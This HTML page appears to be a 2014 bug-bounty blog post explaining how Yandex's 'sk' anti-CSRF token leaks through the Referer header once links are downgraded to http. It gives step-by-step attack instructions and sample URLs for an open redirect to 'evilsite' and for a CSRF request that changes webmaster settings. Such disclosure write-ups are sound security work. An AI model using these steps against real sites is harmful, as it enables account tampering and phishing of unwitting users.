<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>
    
      Bypass anti CSRF token of Yandex! &middot; .adrian{}
    
  </title>

  <link rel="stylesheet" href="/styles.css">
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/public/apple-touch-icon-precomposed.png">
  <link rel="shortcut icon" href="/public/favicon.ico">
  <link rel="alternate" type="application/atom+xml" title=".adrian{}" href="/atom.xml">
  <script type="text/javascript" src="https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-569b61df7d055f6e&async=1" async="async"></script>
  <script type="text/javascript" src="/public/pace/pace.min.js"></script>

  <link rel="stylesheet" type="text/css" href="/public/pace/flat_top.css">
  
  <link rel="stylesheet" type="text/css" href="/public/style.css">
   <script type="text/javascript" src="/public/aa.js"></script>
   
   <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">
  

    
    
</head>


  <body>
    
    <header class="masthead">
        <h3 class="masthead-title">
          
          <ul class="topnav">
           <li>
            <a href="/" title="Home">Home</a>
           
          </li>
            
            
            
              &nbsp;&nbsp;&nbsp;
              <li><a href="/about">About</a></li>
            
              &nbsp;&nbsp;&nbsp;
              <li><a href="/archive">Archive</a></li>
            
              &nbsp;&nbsp;&nbsp;
              <li><a href="/atom.xml">Feed</a></li>
            
            
              <li class="icon">
                <a href="javascript:void(0);" onclick="myFunction()">&#9776; Menu</a>
              </li>
            
            
            </ul>
          
          
          
        </h3>
      </header>
    <div class="container content">

      

      <main>
        <article class="post">
  <h1 class="post-title">Bypass anti CSRF token of Yandex!</h1>
  <time datetime="2014-05-07T00:00:00+00:00" class="post-date">07 May 2014</time>
  <p>When you browse a link in docviewer.yandex.com, The site will recreate a token named <code class="highlighter-rouge">sk</code>, which is used to validate a redirection and anti-csrf token
<code class="highlighter-rouge">sk</code> is also an anti-csrf token on</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text"> http://webmaster.yandex.ru`,`https://docviewer.yandex.com/r.xml.</code></pre></figure>

<p>now  If the attacker know the value of your <code class="highlighter-rouge">sk</code> token, he can make a redirection and csrf attack.
 <strong>How to know the token of the victim ???</strong>.
 Because <code class="highlighter-rouge">http://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&amp;url=evilsite</code> useD GET request the params are showed in url and it also changeable to https to http .as a result you can use <code class="highlighter-rouge">REFRER HEADER</code> to get the token.</p>

<h3 id="hack-steps">HACK STEPS</h3>
<ul>
  <li>Upload a document with link or a hyperlink. that hyperlink is the attacker’s site..</li>
  <li>Select the file, Share the link using the share button then get the link</li>
  <li>Browse that link, Then click the view button you will redirect to docviewer.yandex.com</li>
  <li>Change the https to http to allow us to see the referer in our site.</li>
</ul>

<figure class="highlight"><pre><code class="language-text" data-lang="text"> 
https://docviewer.yandex.com/?url=ya-disk-public://nhP6POxtEi4v9wDffRyOFHbGQgIOhlsEbLhl3zH9c7k%3D&amp;name=testxxx.odt to http://docviewer.yandex.com/?url=ya-disk-public://nhP6POxtEi4v9wDffRyOFHbGQgIOhlsEbLhl3zH9c7k%3D&amp;name=testxxx.odt</code></pre></figure>

<ul>
  <li>Send the url to victim and induce him to click the link for attacker’site to able to leak the anti-CSRF token.</li>
</ul>

<p>now you have his <code class="highlighter-rouge">sk</code> token! that is the bypass!</p>

<p><strong>for redirection</strong></p>

<figure class="highlight"><pre><code class="language-text" data-lang="text"> 
 https://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&amp;url=evilsite
 </code></pre></figure>

<p><strong>for csrf</strong> →</p>

<figure class="highlight"><pre><code class="language-text" data-lang="text">http://webmaster.yandex.com/settings/messages/types.xml?email_1=EMAIL&amp;email_2=EMAIL&amp;message_3=MESSAGE&amp;email_3=EMAIL&amp;message_4=MESSAGE&amp;percent=50&amp;message_5=MESSAGE&amp;message_6=MESSAGE&amp;message_7=MESSAGE&amp;message_8=MESSAGE&amp;email_8=EMAIL&amp;message_9=MESSAGE&amp;message_10=MESSAGE&amp;message_12=MESSAGE&amp;message_17=MESSAGE&amp;message_18=MESSAGE&amp;message_19=MESSAGE&amp;email_19=EMAIL&amp;message_21=MESSAGE&amp;email_21=EMAIL&amp;message_22=MESSAGE&amp;email_22=EMAIL&amp;message_32=MESSAGE&amp;do=save&amp;sk=TOKENOFVICTIM</code></pre></figure>

<p><strong>This is wide CSRF attack which affect other Yandex domain.</strong></p>

<h3 id="list-of-affected-yandex-domain">list of affected Yandex domain</h3>

<ul>
  <li>http://appmetrica.yandex.com/</li>
  <li>https://calendar.yandex.ru</li>
  <li>https://disk.yandex.com/</li>
  <li>docviewer.yandex.com</li>
  <li>m.contact.yandex.com.tr &amp; etc</li>
  <li></li>
</ul>

<p><code class="highlighter-rouge">NOTE: i used javascript code to get the leaked csrf token on refrerer header  and append it to my CSRF PoC.</code></p>

</article>
<div class="addthis_native_toolbox"></div>


<aside class="related">
  <h3>Related posts</h3>
  <ul class="related-posts">
    
    
      <li>
        <a href="/2016/01/01/whats-jekyll/">
          What's Jekyll?
          <small><time datetime="2016-01-01T00:00:00+00:00">01 Jan 2016</time></small>
        </a>
      </li>
    
      <li>
        <a href="/2014/08/15/OCULUS-VR-account-hijacking!-via-password-reset-vulnerability/">
          OCULUS VR account hijacking via password reset vulnerability
          <small><time datetime="2014-08-15T00:00:00+00:00">15 Aug 2014</time></small>
        </a>
      </li>
    
      <li>
        <a href="/2014/07/26/Flowdock-XSS-or-RCE/">
          Flowdock XSS or RCE(malicious file upload)
          <small><time datetime="2014-07-26T00:00:00+00:00">26 Jul 2014</time></small>
        </a>
      </li>
    
    
  </ul>
</aside>


<div id="disqus_thread"></div>
<script>
/**
* RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
* LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables
*/

var disqus_config = function () {
this.page.url = document.location; // Replace PAGE_URL with your page's canonical URL variable
this.page.identifier = "/2014/05/07/leaking-anti-CSRF-token-of-yandex!/"; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
};

(function() { // DON'T EDIT BELOW THIS LINE
var d = document, s = d.createElement('script');

s.src = '//adrianswebsecurityblog.disqus.com/embed.js';

s.setAttribute('data-timestamp', +new Date());
(d.head || d.body).appendChild(s);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>


      </main>

      <footer class="footer">
        <small>
          <div class='social'>
    


    <a title='Twitter' href="https://twitter.com/nukesec">
      <i class="fa fa-twitter-square fa-2x"></i> 
    </a>





    <a title='Github' href="https://github.com/deadstar1">
      <i class="fa fa-github-square fa-2x"></i> 
    </a>





    <a title='Hackerone' href="https://hackerone.com/adrian">
      <i class="fa fa-bug fa-2x"></i> 
    </a>




    <a title='Bugcrowd' href="https://bugcrowd.com/mochocho101">
      <i class="fa fa-bug fa-2x"></i>
    </a>


</div>
<<<<<<< HEAD
          &copy; <time datetime="2016-03-28T05:20:20+00:00">2016</time>. All rights reserved. Independent Style.
=======
          &copy; <time datetime="2016-03-28T05:12:50+00:00">2016</time>. All rights reserved. Independent Style.
>>>>>>> cleanup

            
        </small>
      </footer>
    </div>

    
     <script>
       (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
       (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
       m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
       })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
       ga('create', 'UA-75403295-1', 'auto');
       ga('send', 'pageview');
     </script>
    
  </body>
</html>
